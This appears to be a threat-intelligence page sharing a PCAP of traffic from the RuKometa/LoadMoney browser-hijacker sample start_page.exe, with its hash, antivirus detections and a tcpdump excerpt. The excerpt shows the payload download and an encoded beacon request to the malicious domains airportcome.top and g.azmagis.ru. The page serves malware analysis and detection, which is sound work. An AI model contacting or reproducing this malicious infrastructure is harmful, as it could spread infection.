RuKometa/LoadMoney/Mupad Browser Hijacker Trojan Malware PCAP File download traffic sample start_page.exe

Download Attachments

  • 1 pcap start_page
    start_page
    Date added: January 16, 2017 5:36 am Added by: admin File size: 30 KB Downloads: 96
SHA256: 2030f0f9fa95e6e824d12664b48344c6e4fd58e607c96e6300c88a8292d1f743
File name: start_page.exe
Detection ratio: 44 / 56
Antivirus Result Update
ALYac Trojan.GenericKD.3282138 20170116
AVG Generic38.TUP 20170116
AVware Trojan.Win32.Generic!BT 20170116
Ad-Aware Trojan.GenericKD.3282138 20170116
AegisLab Adware.W32.Extbro!c 20170114
AhnLab-V3 Trojan/Win32.Mupad.C1469490 20170115
Arcabit Trojan.Generic.D3214DA 20170116
Avast Win32:Adware-gen [Adw] 20170116
Avira (no cloud) PUA/LoadMoney.fgl 20170115
BitDefender Trojan.GenericKD.3282138 20170116
CAT-QuickHeal Trojan.Mupad 20170114
ClamAV Win.Adware.Extbro-1 20170116
Comodo ApplicUnwnt.Win32.RuKometa.A 20170116
Cyren W32/S-6a0e4df5!Eldorado 20170116
DrWeb Trojan.LoadMoney.1452 20170116
ESET-NOD32 a variant of Win32/RuKometa.E potentially unwanted 20170115

 

2017-01-16 00:10:18.346622 IP 192.168.1.102.63320 > 193.238.152.147.80: Flags [P.], seq 0:308, ack 1, win 256, length 308: HTTP: GET /start_page.exe HTTP/1.1
E..\`.@…|….f…..X.P…..U..P…….GET /start_page.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: hldklshzunakfbm.airportcome.top
Connection: Keep-Alive

2017-01-16 00:11:03.997483 IP 192.168.1.102.64417 > 75.75.75.75.53: 63876+ A? g.azmagis.ru. (30)
E..:…….R…fKKKK…5.&……………g.azmagis.ru…..
2017-01-16 00:11:04.168379 IP 192.168.1.102.63322 > 185.20.186.52.80: Flags [S], seq 1745079406, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4A.@……..f…4.Z.Ph..n…… ……………..
2017-01-16 00:11:04.273747 IP 192.168.1.102.63322 > 185.20.186.52.80: Flags [.], ack 3445242612, win 256, length 0
E..(A.@……..f…4.Z.Ph..o.Z:.P…E………
2017-01-16 00:11:04.274405 IP 192.168.1.102.63322 > 185.20.186.52.80: Flags [P.], seq 0:500, ack 1, win 256, length 500: HTTP: GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%23%93%13%56%83%56%26%33%33%83%03%33%43%03%23%03%26%43%83%73%63%46%03%13%36%46%63%16%73%63%73%13%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
E…A.@……..f…4.Z.Ph..o.Z:.P…H…GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%23%93%13%56%83%56%26%33%33%83%03%33%43%03%23%03%26%43%83%73%63%46%03%13%36%46%63%16%73%63%73%13%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: start_page 3.35
Host: g.azmagis.ru
Cache-Control: no-cache

Share

Leave a Reply